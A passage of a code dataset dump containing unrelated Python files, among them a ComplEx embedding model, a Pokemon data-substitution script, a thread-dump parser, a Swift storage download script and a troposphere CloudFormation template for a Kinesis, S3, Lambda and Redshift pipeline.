pred_heads = realrealreal + realimgimg + imgrealimg - imgimgreal\n pred_heads = tf.nn.sigmoid(pred_heads)\n\n _, head_rank = tf.nn.top_k(pred_tails, k=self.data_stats.tot_entity)\n _, tail_rank = tf.nn.top_k(pred_heads, k=self.data_stats.tot_entity)\n\n return head_rank, tail_rank\n\n def embed(self, h, r, t):\n \"\"\"function to get the embedding value\"\"\"\n norm_emb_e_real = tf.nn.l2_normalize(self.emb_e_real, axis=1)\n norm_emb_e_img = tf.nn.l2_normalize(self.emb_e_img, axis=1)\n norm_emb_rel_real = tf.nn.l2_normalize(self.emb_rel_real, axis=1)\n norm_emb_rel_img = tf.nn.l2_normalize(self.emb_rel_img, axis=1)\n\n h_emb_real = tf.nn.embedding_lookup(norm_emb_e_real, h)\n t_emb_real = tf.nn.embedding_lookup(norm_emb_e_real, t)\n\n h_emb_img = tf.nn.embedding_lookup(norm_emb_e_img, h)\n t_emb_img = tf.nn.embedding_lookup(norm_emb_e_img, t)\n\n r_emb_real = tf.nn.embedding_lookup(norm_emb_rel_real, r)\n r_emb_img = tf.nn.embedding_lookup(norm_emb_rel_img, r)\n\n return h_emb_real, h_emb_img, r_emb_real, r_emb_img, t_emb_real, t_emb_img\n\n def get_embed(self, h, r, t, sess=None):\n \"\"\"function to get the embedding value in numpy\"\"\"\n h_emb_real, h_emb_img, r_emb_real, r_emb_img, t_emb_real, t_emb_img = self.embed(h, r, t)\n h_emb_real, h_emb_img, r_emb_real, r_emb_img, t_emb_real, t_emb_img = sess.run(\n [h_emb_real, h_emb_img, r_emb_real, r_emb_img, t_emb_real, t_emb_img])\n return h_emb_real, h_emb_img, r_emb_real, r_emb_img, t_emb_real, t_emb_img\n\n def get_proj_embed(self, h, r, t, sess):\n \"\"\"function to get the projected embedding value in numpy\"\"\"\n return self.get_embed(h, r, t, sess)\n","sub_path":"pykg2vec/core/Complex.py","file_name":"Complex.py","file_ext":"py","file_size_in_byte":9765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"416438971","text":"# coding: utf-8\n# 3층 신경망 구현하기 – 신호전달 구현1: 은닉1층 전달\nimport numpy as np\n\nprint('\\n= 신호전달 구현1: 은닉1층 전달 ==============================')\n\nx = np.array([1., 5.])\nprint(f'x dimension: {x.shape}') # 2 vector\nw1 = np.array([\n [0.1, 0.2, 0.5],\n [0.3, 0.4, 1.]\n])\nprint(f'w1 dimension: {w1.shape}') # 2 X 3 matrix\nb1 = np.array([0.1, 0.2, 0.3])\nprint(f'b1 dimension: {b1.shape}') # 3 vector\n# 오류: 일차함수(식) 중심으로 생각하지 말고 신호 중심으로 생각 할 것\n# a1 = np.dot(w1, x) + b1\na1 = np.dot(x, w1) + b1\nprint(f'a1 = {a1}')\n\n# tensor flows~\n# 3 x 2(m) 2(v) -> 3(v)\n# tensor1(크기2) 입력신호가 뉴런에서 tensor2(가중치)와 총합으로 tensor1(크기3) 출력신호가 되었다.\n","sub_path":"04.deep-learning/02.neural-network/03.3-layer-neural-network-practices/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"516833950","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom forms import AddedPokes\n\n\ndef attack_substitution(num, attack):\n if attack is None:\n raise Exception()\n elif attack == 'After You':\n # Patrat/Watchog\n if num == 504 or num == 505:\n return 'Covet'\n # Lopunny\n elif num == 428:\n return 'Draining Kiss'\n # Petilil\n elif num == 548:\n return 'Heal Bell'\n # Minccino\n elif num == 572:\n return 'Iron Tail'\n # Togetic/Togekiss\n elif num == 176 or num == 468:\n return 'Moonblast'\n # Togepi\n elif num == 175:\n return 'Soft Boiled'\n # Buneary\n elif num == 427:\n return 'Sweet Kiss'\n # Clefairy and Audino\n elif num == 35 or num == 531:\n return 'Wish'\n # Oranguru\n elif num == 765:\n return 'Wonder Room'\n # Maractus\n elif num == 556:\n return 'Wood Hammer'\n elif attack == 'Ally Switch':\n # Kadabra/Alakazam\n if num == 64 or num == 65:\n return 'Barrier'\n # Hoopa\n elif num == 720:\n return 'Magic Room'\n elif attack == 'Follow Me':\n # Sentret/Furret\n if num == 161 or num == 162:\n return 'Covet'\n # Togepi/Togetic\n elif num == 175 or num == 176:\n return 'Draining Kiss'\n # Clefairy\n elif num == 35:\n return 'Mimic'\n elif attack == 'Frustration':\n # Buneary\n if num == 427:\n return 'Fake Tears'\n elif attack == 'Helping Hand':\n # Meowstic\n if num == 678:\n return 'Assist'\n # Jirachi\n elif num == 385:\n return 'Calm Mind'\n # Sentret/Furret\n elif num == 161 or num == 162:\n return 'Charm'\n # Tyrogue and Minccino\n elif num == 236 or num == 572:\n return 'Covet'\n # Volbeat/Illumise\n elif num == 313 or num == 314:\n return 'Dizzy Punch'\n # Marill/Azumarill/Azurill\n elif num == 183 or num == 184 or num == 298:\n return 'Draining Kiss'\n # Gallade\n elif num == 475:\n return 'Dual Chop'\n # Petilil\n elif num == 548:\n return 'Fairy Wind'\n # Audino\n elif num == 531:\n return 'Heal Bell'\n # Growlithe and Lillipup line\n elif num == 58 or 506 <= num <= 508:\n return 'Howl'\n # Keldeo\n elif num == 647:\n return 'Icy Wind'\n # Cobalion\n elif num == 638:\n return 'Iron Defense'\n # Cinccino\n elif num == 573:\n return 'Iron Tail'\n # Magearna\n elif num == 801:\n return 'Light Screen'\n # Comfey\n elif num == 764:\n return 'Lucky Chant'\n # Leavanny\n elif num == 542:\n return 'Me First'\n # Nidoran line\n elif 29 <= num <= 33:\n return 'Poison Tail'\n # Alomomola\n elif num == 594:\n return 'Refresh'\n # Terrakion\n elif num == 639:\n return 'Stealth Rock'\n # Plusle/Minun\n elif num == 311 or num == 312:\n return 'Sweet Kiss'\n # Virizion\n elif num == 640:\n return 'Synthesis'\n # Latias/Latios and Cottonee and Oricorio\n elif num in [380, 381, 546, 741]:\n return 'Tailwind'\n # Cherubi/Cherrim and Pykumuku\n elif num == 420 or num == 421 or num == 771:\n return 'Tickle'\n # Wishiwashi\n elif num == 746:\n return 'Water Sport'\n # Eeveelutions all start with this\n # Also Poipole and Naganadel -- TODO: too lazy to come up with an alternative right now\n elif num in [133, 134, 135, 136, 196, 197, 470, 471, 700, 803, 804]:\n return None\n elif attack == 'Instruct':\n # Oranguru\n if num == 765:\n return 'Light Screen'\n elif attack == 'Quash':\n # Sableye\n if num == 302 or num == AddedPokes.MEGA_SABLEYE.value:\n return 'Night Slash'\n # Oranguru\n elif num == 765:\n return 'Psychic Terrain'\n # Murkrow/Honchkrow\n elif num == 198 or num == 430:\n return 'Roost'\n elif attack == 'Rage Powder':\n # Foongus/Amoonguss\n if num == 590 or num == 591:\n return 'Gastro Acid'\n # Paras/Parasect\n elif num == 46 or num == 47:\n return 'Leech Life'\n # Butterfree and Volcarona\n elif num == 12 or num == 637:\n return 'Morning Sun'\n # Hoppip line\n elif 187 <= num <= 189:\n return 'Silver Wind'\n elif attack == 'Return':\n # Lopunny\n if num == 428:\n return 'Captivate'\n elif attack == 'Spotlight':\n # Morelull/Shiinotic\n if num == 755 or num == 756:\n return 'Aromatherapy'\n # Starmie\n elif num == 121:\n return 'Cosmic Power'\n # Lanturn\n elif num == 171:\n return 'Soak'\n # Clefairy/Clefable\n elif num == 35 or num == 36:\n return 'Wish'\n elif attack == 'Wide Guard':\n # Mareanie/Toxapex\n if num == 747 or num == 748:\n return 'Acid Armor'\n # Throh\n elif num == 538:\n return 'Brick Break'\n # Mantine/Mantyke\n elif num == 226 or num == 458:\n return 'Dive'\n # Hitmontop\n elif num == 237:\n return 'Drill Run'\n # Mienshao\n elif num == 620:\n return 'Dual Chop'\n # Kingler\n elif num == 99:\n return 'Fury Cutter'\n # Tirtouga/Carracosta\n elif num == 564 or num == 565:\n return 'Iron Defense'\n # Lunala\n elif num == 792:\n return 'Light Screen'\n # Hitmonlee\n elif num == 106:\n return 'Low Kick'\n # Regigagas\n elif num == 486:\n return 'Mega Punch'\n # Alomomola and Avalugg\n elif num == 594 or num == 713:\n return 'Mist'\n # Solgaleo\n elif num == 791:\n return 'Reflect'\n # Gallade\n elif num == 475:\n return 'Sacred Sword'\n # Probopass\n elif num == 476:\n return 'Stealth Rock'\n # Araquanid\n elif num == 752:\n return 'Sticky Web'\n # Stakataka\n elif num == 805:\n return 'Stone Edge'\n # Machamp\n elif num == 68:\n return 'Superpower'\n # Mr. Mime\n elif num == 122:\n return 'Teeter Dance'\n # Celesteela and Guzzlord -- TODO: too lazy to come up with an alternative right now\n elif num == 797 or num == 799:\n return None\n elif attack == 'Ion Deluge':\n # Replace for all Pokemon\n return 'Electrify'\n elif attack == 'Judgment':\n # Intentional spelling change -- applies to all obviously\n return 'Judgement'\n\n return attack\n\n\ndef ability_substitution(num, ability):\n if ability == 'Battery':\n # Charjabug\n if num == 737:\n return 'Static'\n elif ability == 'Early Bird':\n # Natu/Xatu -- I just love this ability and I want more Pokemon to have it\n if num == 177 or num == 178:\n return 'Magic Bounce'\n elif ability == 'Friend Guard':\n # Spewpa\n if num == 665:\n return 'No_Ability'\n elif ability == 'Illuminate':\n # Staryu/Starmie and Watchog\n if num == 120 or num == 121 or num == 505:\n return 'Analytic'\n # Volbeat\n elif num == 313:\n return 'Prankster'\n elif num == 755 or num == 756:\n return 'Rain Dish'\n # Chinchou/Lanturn\n elif num == 170 or num == 171:\n return 'Water Absorb'\n elif ability == 'Minus':\n # Klink line\n if 599 <= num <= 601:\n return 'No_Ability'\n # Minun\n elif num == 312:\n return 'Static'\n elif ability == 'Power Construct':\n # Zygarde -- this should always be true if inside this if\n if num == 718:\n return 'No_Ability'\n elif ability == 'Plus':\n # Klink line\n if 599 <= num <= 601:\n return 'Clear Body'\n # Mareep line\n elif 179 <= num <= 181:\n return 'No_Ability'\n # Plusle\n elif num == 311:\n return 'Static'\n elif ability == 'Receiver':\n # Passimian\n if num == 766:\n return 'No_Ability'\n elif ability == 'Run Away':\n # Ponyta/Rapidash should really have this ability\n if num == 77 or num == 78:\n return 'Flame Body'\n elif ability == 'Stall':\n # Sableye -- Prankster is way cooler\n if num == 302:\n return 'Prankster'\n elif ability == 'Symbiosis':\n # Flabebe line\n if 669 <= num <= 671:\n return 'Flower Gift'\n elif ability == 'Telepathy':\n # Elgyem/Beheeyem\n if num == 605 or num == 606:\n return 'Analytic'\n # Wobbuffet/Wynaut and Meditite/Medicham and Dialga/Palkia/Giratina\n # and Oranguru and the Tapus\n elif num == 202 or num == 360 \\\n or num == 307 or num == 308 \\\n or num == 483 or num == 484 or num == 487 \\\n or num == 765 \\\n or 785 <= num <= 788:\n return 'No_Ability'\n elif ability == 'Zen Mode':\n if num == 555:\n return 'No_Ability'\n\n return ability\n\n\n# My personal type changes\ndef type_substitution(num, types):\n # Ninetales is now Psychic type\n if num == 38:\n assert types == ['Fire', 'No_Type']\n return ['Fire', 'Psychic']\n # Psyduck/Golduck are now Psychic type\n elif num == 54 or num == 55:\n assert types == ['Water', 'No_Type']\n return ['Water', 'Psychic']\n # Horsea/Seadra are now Dragon type\n elif num == 116 or num == 117:\n assert types == ['Water', 'No_Type']\n return ['Water', 'Dragon']\n # Gyarados is now Water/Dragon instead of Water/Flying\n elif num == 130:\n assert types == ['Water', 'Flying']\n return ['Water', 'Dragon']\n # Noctowl is now Psychic/Flying\n elif num == 164:\n assert types == ['Normal', 'Flying']\n return ['Psychic', 'Flying']\n # Luxray is now Dark type\n elif num == 405:\n assert types == ['Electric', 'No_Type']\n return ['Electric', 'Dark']\n # Flabebe line is now Grass type\n elif 669 <= num <= 671:\n assert types == ['Fairy', 'No_Type']\n return ['Fairy', 'Grass']\n # Goomy line is now Water type\n elif 704 <= num <= 706:\n assert types == ['Dragon', 'No_Type']\n return ['Dragon', 'Water']\n # Mega Absol (Asbel) is Fairy type :)\n elif num == AddedPokes.MEGA_ABSOL.value:\n assert types == ['Dark', 'No_Type']\n return ['Dark', 'Fairy']\n\n return types\n","sub_path":"scripts/substitution.py","file_name":"substitution.py","file_ext":"py","file_size_in_byte":11093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"109273036","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport logging\n\nimport threading\nimport rcp\n\nlogging.basicConfig(level=logging.DEBUG,\n format='[%(asctime)s][%(levelname)s] %(message)s')\n_log = logging.getLogger(__name__)\n\n\nclass LampProxy(rcp.Proxy):\n def set_status(self, status):\n return self._make('set_status')(status)\n\n\nlamp = LampProxy('127.0.0.1/lamp')\nlamp.set_status(True)\nlamp.set_status(False)\n\n'''\n_log.info('Starting 1')\nthreading.Thread(target=lamp.set_status, args=(True,)).start()\n\n_log.info('Starting 2')\nthreading.Thread(target=rcp.Function('127.0.0.1/DO_SOME_SHIT')).start()\n\n_log.info('Starting 3')\nrcp.call('127.0.0.1/lamp/set_status', args=[True])\n'''\n","sub_path":"example/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"187061816","text":"Lvls = input().strip().split()\n\ndef CheckRise(Elevation, i=None, memo=None):\n if memo is None:\n memo=[]\n if i is None:\n i=0\n memo.append(0)\n j = i+1\n k = i\n if j < len(Elevation)-2 and k < len(Elevation)-1:\n while Elevation[j] > Elevation[k]:\n memo[-1] += 1\n j+= 1\n k += 1\n if i < len(Elevation)-1 :\n return CheckRise(Elevation, i+1, memo)\n if i == len(Elevation)-1:\n return [str(n) for n in memo]\n\n\nx = CheckRise(Lvls)\nprint(\" \".join(x))\n","sub_path":"Mornings/climb.py","file_name":"climb.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"201831376","text":"import re\r\nimport datetime\r\nfrom stackrecord import StackRecord\r\n\r\n#ignore = ['LDAPConnThread','Timer','MTUTimer','ClientNotifForwarder','DoSManager']\r\n\r\ndef parsetimestamprec(rec):\r\n\r\n pattern = r'^(\\d{4})-(\\d{2})-(\\d{2}) (\\d{2}):(\\d{2}):(\\d{2})'\r\n\r\n match = re.search(pattern, rec)\r\n if match:\r\n yr = int(match.group(1))\r\n mo = int(match.group(2))\r\n dy = int(match.group(3))\r\n h = int(match.group(4))\r\n m = int(match.group(5))\r\n s = int(match.group(6))\r\n\r\n return datetime.datetime(yr, mo, dy, h, m, s)\r\n\r\n return None\r\n\r\n\r\ndef parsemetarec(rec):\r\n\r\n pattern = r'^Full thread dump'\r\n\r\n match = re.search(pattern, rec)\r\n if match:\r\n return rec\r\n\r\n return None\r\n\r\n\r\ndef parseheaderrec(rec):\r\n\r\n # prepare dictionary object for header elements\r\n attrib = {}\r\n\r\n # thread name\r\n match = re.search(r'\\\"(.+?)\\\"', rec)\r\n if match:\r\n name = match.group(1)\r\n attrib['name'] = name\r\n\r\n else:\r\n attrib['name'] = ''\r\n\r\n # #number\r\n match = re.search(r'\\#(\\d+)\\s', rec)\r\n if match:\r\n num = int(match.group(1))\r\n attrib['num'] = num\r\n\r\n else:\r\n attrib['num'] = ''\r\n\r\n # daemon\r\n match = re.search(r'daemon', rec)\r\n if match:\r\n daemon = True\r\n else:\r\n daemon = False\r\n\r\n attrib['daemon'] = daemon\r\n\r\n # priority\r\n match = re.search(r'prio=(\\d+)', rec)\r\n if match:\r\n prio = int(match.group(1))\r\n attrib['prio'] = prio\r\n\r\n else:\r\n attrib['prio'] = ''\r\n\r\n # OS priority\r\n match = re.search(r'os_prio=(\\d+)', rec)\r\n if match:\r\n os_prio = int(match.group(1))\r\n attrib['os_prio'] = os_prio\r\n\r\n else:\r\n attrib['os_prio'] = ''\r\n\r\n # tid\r\n match = re.search(r'tid=([0-9a-z]+)', rec)\r\n if match:\r\n tid = match.group(1)\r\n attrib['tid'] = tid\r\n\r\n else:\r\n attrib['tid'] = ''\r\n\r\n # nid, state, mem\r\n match = re.search(r'nid=([0-9a-z]+)\\s([0-9a-z ]+)\\s\\[([0-9a-z]+)\\]', rec)\r\n if match:\r\n nid = match.group(1)\r\n state = match.group(2)\r\n mem = match.group(3)\r\n\r\n attrib['nid'] = nid\r\n attrib['state'] = state\r\n attrib['mem'] = mem\r\n\r\n else:\r\n attrib['nid'] = ''\r\n attrib['state'] = ''\r\n attrib['mem'] = ''\r\n\r\n return attrib\r\n\r\n\r\ndef parsestatusrec(rec):\r\n\r\n pattern = r'java.lang.Thread.State\\:\\s(.+)'\r\n\r\n match = re.search(pattern, rec)\r\n if match:\r\n return match.group(1)\r\n\r\n return None\r\n\r\n\r\ndef parsestackrec(rec):\r\n\r\n pattern = r'at\\s([0-9a-zA-z.$]+)\\((.+?)\\)'\r\n\r\n match = re.search(pattern, rec)\r\n if match:\r\n method = match.group(1)\r\n methodsrc = match.group(2)\r\n\r\n splitmethod = method.split('.')\r\n\r\n s = StackRecord()\r\n s.stackrec = method\r\n s.source = methodsrc\r\n s.elements = splitmethod\r\n s.rec_type = 'METHOD'\r\n\r\n #print(s)\r\n return s\r\n\r\n return None\r\n\r\n\r\ndef parseactionrec(rec):\r\n\r\n pattern = r'^-\\s([a-zA-Z0-9 ]+)\\<(.+?)\\>\\s\\((.+?)\\)'\r\n\r\n match = re.search(pattern, rec)\r\n if match:\r\n\r\n s = StackRecord()\r\n action = match.group(1).strip()\r\n if action == 'locked':\r\n s.locked = True\r\n\r\n elif action == 'parking to wait for':\r\n s.parking = True\r\n\r\n elif action == 'waiting on':\r\n s.waiting = True\r\n\r\n else:\r\n return None\r\n\r\n s.monitor_addr = match.group(2)\r\n s.monitor_type = match.group(3)[2:]\r\n s.rec_type = 'MONITOR'\r\n\r\n #print(s)\r\n return s\r\n\r\n return None\r\n\r\n\r\n\r\n","sub_path":"threadparser.py","file_name":"threadparser.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"261899954","text":"\"\"\"\nPulls the data from Swift and places it into the empty directory\nSWIFT_KEY environment variable to be passed by the template\n\"\"\"\n\nimport os\nimport zipfile\nimport time\nimport fasteners\nfrom io import BytesIO\nfrom swift_handler import SwiftHandler\n\n\nclass SwiftStore():\n\n swiftConnection = None\n\n\n def _getObject(self, key, b_delete):\n \"\"\"\n Returns an object associated with the specified key in the specified container\n Deletes the object after returning if specified\n \"\"\"\n\n try:\n containerName = key\n key = os.path.join('input','data')\n swiftDataObject = self.swiftConnection.get_object(containerName, key)\n if b_delete:\n self.swiftConnection.delete_object(containerName, key)\n self.qrint('Deleted object with key %s' %key)\n\n except Exception as exp:\n print(exp)\n\n return swiftDataObject\n\n\n def getData(self, **kwargs):\n \"\"\"\n Gets the data from the Swift storage, zips and/or encodes it and sends it to the client\n \"\"\"\n\n for k,v in kwargs.items():\n if k == 'path':\n key = v\n if k == 'in_dir':\n incoming_dir = v\n if k == 'out_dir':\n outgoing_dir = v\n\n try:\n swiftHandler = SwiftHandler()\n self.swiftConnection = swiftHandler._initiateSwiftConnection()\n dataObject = self._getObject(key, False)\n except Exception as err:\n print(err)\n \n objectInformation= dataObject[0]\n objectValue= dataObject[1]\n fileContent= objectValue\n\n fileBytes = BytesIO(fileContent)\n\n zipfileObj = zipfile.ZipFile(fileBytes, 'r', compression = zipfile.ZIP_DEFLATED)\n # We are extracting to the file to incoming_dir in container\n zipfileObj.extractall(incoming_dir)\n # Create outgoing_dir directory as the plugin container will output data there after processing.\n if not os.path.exists(outgoing_dir):\n os.makedirs(outgoing_dir)\n\nif __name__ == \"__main__\":\n incoming_dir = os.environ.get(\"INCOMING_DIR\")\n obj = SwiftStore()\n # The init-storage container in all the pods should acquire the lock\n with fasteners.InterProcessLock(\"/share/.lockfile\"):\n # If \"/share/.download-failed\" exists, exit with an error code immediately\n if os.path.exists(\"/share/.download-failed\"):\n print(\"Previous pod failed to download the data. Exiting with failure...\")\n exit(1)\n # If there is some data in incoming_dir but \"/share/.download-succeeded\" doesn't exist, it is a failure case\n # Exit with error code immediately\n if os.path.exists(incoming_dir) and len(os.listdir(incoming_dir)) > 0 and not os.path.exists('/share/.download-succeeded'):\n print(\"Some data was downloaded, but '/share/.download-succeeded' file doesn't exist. Exiting with failure...\")\n exit(1)\n # Download the data if \"/share/.download-succeeded\" does not exist\n if not os.path.exists('/share/.download-succeeded'):\n try:\n print(\"Lock acquired. Downloading data from Swift...\")\n obj.getData(path=os.environ.get('SWIFT_KEY'), in_dir=incoming_dir, out_dir=os.environ.get('OUTGOING_DIR'))\n os.mknod('/local/.download-pod')\n except Exception as err:\n print(\"Failed to download the data:\", err)\n # Create a failed file, if download failed to complete\n os.mknod(\"/share/.download-failed\")\n exit(1)\n # Create a success file, if download completed successfully\n os.mknod(\"/share/.download-succeeded\")\n print(\"Data downloaded!\")\n","sub_path":"openshift/pman-swift-publisher/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"109318322","text":"#!/usr/bin/env python2\n\n# Uses FAdo (python2):\n#\n# doc: http://pythonhosted.org/FAdo/\n# git: https://github.com/Glavin001/FAdo\n#\n# To install:\n#\n# $ pip install FAdo\n\nfrom FAdo.fa import *\n\nm3 = NFA()\nm3.setSigma(['0'])\nm3.addState(0)\nm3.addTransition(0, '0', 0)\nprint(m3)\n","sub_path":"automata/automata.py","file_name":"automata.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"563725887","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n\"\"\"\n\n# standard library imports\nimport logging\n# related imports\n# project imports\nfrom twittator.core.error import NoSuchTwitterAccount\n\nclass TwitterAccounts():\n \"\"\"\n Combines all controllable twitter accounts (soldiers and slaves)\n \"\"\"\n l = logging.getLogger(\"twittator.twitter_accounts\")\n\n def __init__(self):\n self._soldiers = []\n self._slaves = []\n\n def initialize(self, soldiers_model, slaves_model):\n try:\n self._soldiers = soldiers_model.instance()\n except Exception:\n self.l.warning(\"Could not get soldiers_model instance\")\n try:\n self._slaves = slaves_model.instance()\n except Exception:\n self.l.warning(\"Could not get slaves_model instance\")\n\n def terminate(self):\n pass\n\n def __iter__(self):\n return iter(list(self._soldiers) + list(self._slaves))\n\n def __getitem__(self, username):\n for account in self._soldiers:\n if account.username == username:\n return account\n else:\n for account in self._slaves:\n if account.username == username:\n return account\n else:\n raise NoSuchTwitterAccount(username)\n\n# ### singleton instance handling\n_instance = None\n\ndef create_instance():\n from twittator.model import soldiers_model, slaves_model\n global _instance\n _instance = TwitterAccounts()\n _instance.initialize(soldiers_model, slaves_model)\n\ndef destroy_instance():\n global _instance\n _instance.terminate()\n\ndef instance():\n global _instance\n assert _instance is not None, \"Instance not created yet!\"\n return _instance\n\ntwitter_proxy_instance = instance","sub_path":"twittator/model/twitter_accounts.py","file_name":"twitter_accounts.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"401885695","text":"from troposphere import Template, Ref, Tags, Join, GetAtt, Parameter\nfrom troposphere.kinesis import Stream\nfrom troposphere.s3 import Bucket, LifecycleConfiguration\nfrom troposphere.s3 import LifecycleRule, LifecycleRuleTransition\nfrom troposphere.iam import Role, PolicyProperty\nfrom troposphere.awslambda import Function, Code\nfrom troposphere.redshift import Cluster\nfrom troposphere.redshift import ClusterSecurityGroup\nfrom troposphere.redshift import ClusterSecurityGroupIngress\n\nfrom awacs.aws import Policy, Statement, Principal, Action\n\n\nowner = \"MyName\"\nowner_email = \"MyEmail\"\ndate = \"2015-08-10\"\nregion = \"eu-west-1\"\naccount_id = \"123456789101\"\nbucket_name = \"my-big-data-pipeline\"\nlambda_function_name = \"moveToS3\"\n\nt = Template()\nt.add_description(\"Example big data pipeline\")\n\n###############################################################################\n\nlambda_repository_bucket_name = t.add_parameter(Parameter(\n \"LambdaRepoS3BucketName\",\n Type=\"String\",\n Description=\"Name of bucket where versioned lambda zip are stored\"\n))\n\nlambda_repository_bucket_key = t.add_parameter(Parameter(\n \"LambdaRepoS3BucketKey\",\n Type=\"String\",\n Description=\"Key in bucket where versioned lambda zip is\"\n))\n\nlambda_repository_bucket_version = t.add_parameter(Parameter(\n \"LambdaRepoS3BucketVersion\",\n Type=\"String\",\n Description=\"Version of bucket where lambda zip is\"\n))\n\nconnect_from_ip = t.add_parameter(Parameter(\n \"ConnectFromCidr\",\n ConstraintDescription=\"must be a valid CIDR range of the form x.x.x.x/x.\",\n Description=\"IP CIDR from where you could access the Redshift cluster\",\n Default=\"0.0.0.0/0\",\n MinLength=\"9\",\n AllowedPattern=(\n \"(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\\\d{1,3})/(\\\\d{1,2})\"\n ),\n MaxLength=\"18\",\n Type=\"String\"\n))\n\nmaster_password = t.add_parameter(Parameter(\n \"RedShiftMasterPassword\",\n Description=\"Redshift master password\",\n Type=\"String\",\n NoEcho=True\n))\n\n###############################################################################\n\nkinesis_stream = t.add_resource(Stream(\n \"KinesisStream\",\n ShardCount=1\n))\n\n###############################################################################\n\ns3_lifecycle_rule = LifecycleRule(\n Status=\"Enabled\",\n Transition=LifecycleRuleTransition(\n StorageClass=\"Glacier\",\n TransitionInDays=30\n )\n)\n\n# NOTE: should really add \"retain\" if deleted.\ns3_bucket = t.add_resource(Bucket(\n \"S3Bucket\",\n BucketName=bucket_name,\n LifecycleConfiguration=LifecycleConfiguration(\n Rules=[s3_lifecycle_rule]\n ),\n Tags=Tags(\n Duration=date,\n Owner=owner_email,\n Name=Join(\"_\", [\"Training\", owner, \"RawStorageBucket\"]),\n )\n))\n\n###############################################################################\n\nlambda_iam_policy = PolicyProperty(\n PolicyName=\"lambda-execution-policy\",\n PolicyDocument=Policy(\n Statement=[\n Statement(\n Effect=\"Allow\",\n Action=[\n Action(\"s3\", \"ListBucket\")\n ],\n Resource=[\"arn:aws:s3:::{0}\".format(bucket_name)]\n ),\n Statement(\n Effect=\"Allow\",\n Action=[\n Action(\"s3\", \"PutObject\")\n ],\n Resource=[\"arn:aws:s3:::{0}/*\".format(bucket_name)]\n ),\n Statement(\n Effect=\"Allow\",\n Action=[\n Action(\"kinesis\", \"Describe*\"),\n Action(\"kinesis\", \"List*\"),\n Action(\"kinesis\", \"Get*\")\n ],\n Resource=[Join(\n \"\",\n [\n \"arn:aws:kinesis:{0}:{1}:stream/\".format(\n region, account_id\n ),\n Ref(kinesis_stream)\n ]\n )]\n )\n ]\n )\n)\n\nlambda_iam_role = t.add_resource(Role(\n \"LambdaIAMRole\",\n AssumeRolePolicyDocument=Policy(\n Statement=[Statement(\n Effect=\"Allow\",\n Principal=Principal(\n \"Service\", [\"lambda.amazonaws.com\"]\n ),\n Action=[Action(\"sts\", \"AssumeRole\")]\n )]\n ),\n Path=\"/\",\n Policies=[lambda_iam_policy]\n))\n\nlambda_function = t.add_resource(Function(\n \"MoveToS3\",\n Code=Code(\n S3Bucket=Ref(lambda_repository_bucket_name),\n S3Key=Ref(lambda_repository_bucket_key),\n S3ObjectVersion=Ref(lambda_repository_bucket_version)\n ),\n Handler=\"{0}.handler\".format(lambda_function_name),\n Role=GetAtt(lambda_iam_role, \"Arn\"),\n Runtime=\"nodejs\",\n Timeout=\"6\"\n))\n\n###############################################################################\n\nredshift_security_group = t.add_resource(ClusterSecurityGroup(\n \"RedshiftSecurityGroup\",\n Description=\"SG to restrict inbound internet access\"\n))\n\nredshift_security_group_ingress = t.add_resource(ClusterSecurityGroupIngress(\n \"RedshiftSecurityGroupIngress\",\n ClusterSecurityGroupName=Ref(redshift_security_group),\n CIDRIP=Ref(connect_from_ip)\n))\n\nredshiftcluster = t.add_resource(Cluster(\n \"RedshiftCluster\",\n ClusterType=\"single-node\",\n ClusterSecurityGroups=[Ref(redshift_security_group)],\n NodeType=\"dc1.large\",\n DBName=\"bigdatatest\",\n MasterUsername=\"admin\",\n MasterUserPassword=Ref(master_password),\n PubliclyAccessible=True\n))\n\n###############################################################################\n\nprint(t.to_json())\n","sub_path":"cloudformation/src/big-data-pipeline.py","file_name":"big-data-pipeline.py","file_ext":"py","file_size_in_byte":5590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"316429109","text":"def main():\n from sys import stdin\n input = stdin.readline\n n = int(input())\n S = [input() for _ in [0]*n]\n s2 = []\n s3 = []\n for s in S:\n temp = [0, 0]\n m = 0\n now = 0\n for i in s.strip('\\n'):\n if i == \"(\":\n now += 1\n else:\n now -= 1\n m = min(m, now)\n temp = [-m, (s.count(\"(\")-s.count(\")\"))-m]\n if temp[0] < temp[1]:\n s2.append(temp)\n else:\n s3.append(temp)\n s2.sort(key=lambda x: (x[0]))\n s3.sort(key=lambda x: (-x[1]))\n cnt = 0\n for i, j in s2:\n cnt -= i\n if cnt < 0:\n print(\"No\")\n return\n cnt += j\n for i, j in s3:\n cnt -= i\n if cnt < 0:\n print(\"No\")\n return\n cnt += j\n if cnt != 0:\n print(\"No\")\n return\n print(\"Yes\")\n\n\nmain()\n","sub_path":"Python_codes/p02686/s392310458.py","file_name":"s392310458.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"433787122","text":"# -*- coding: utf-8 -*-\nimport os\nimport scrapy\nimport pandas as pd \n\ndir_path = 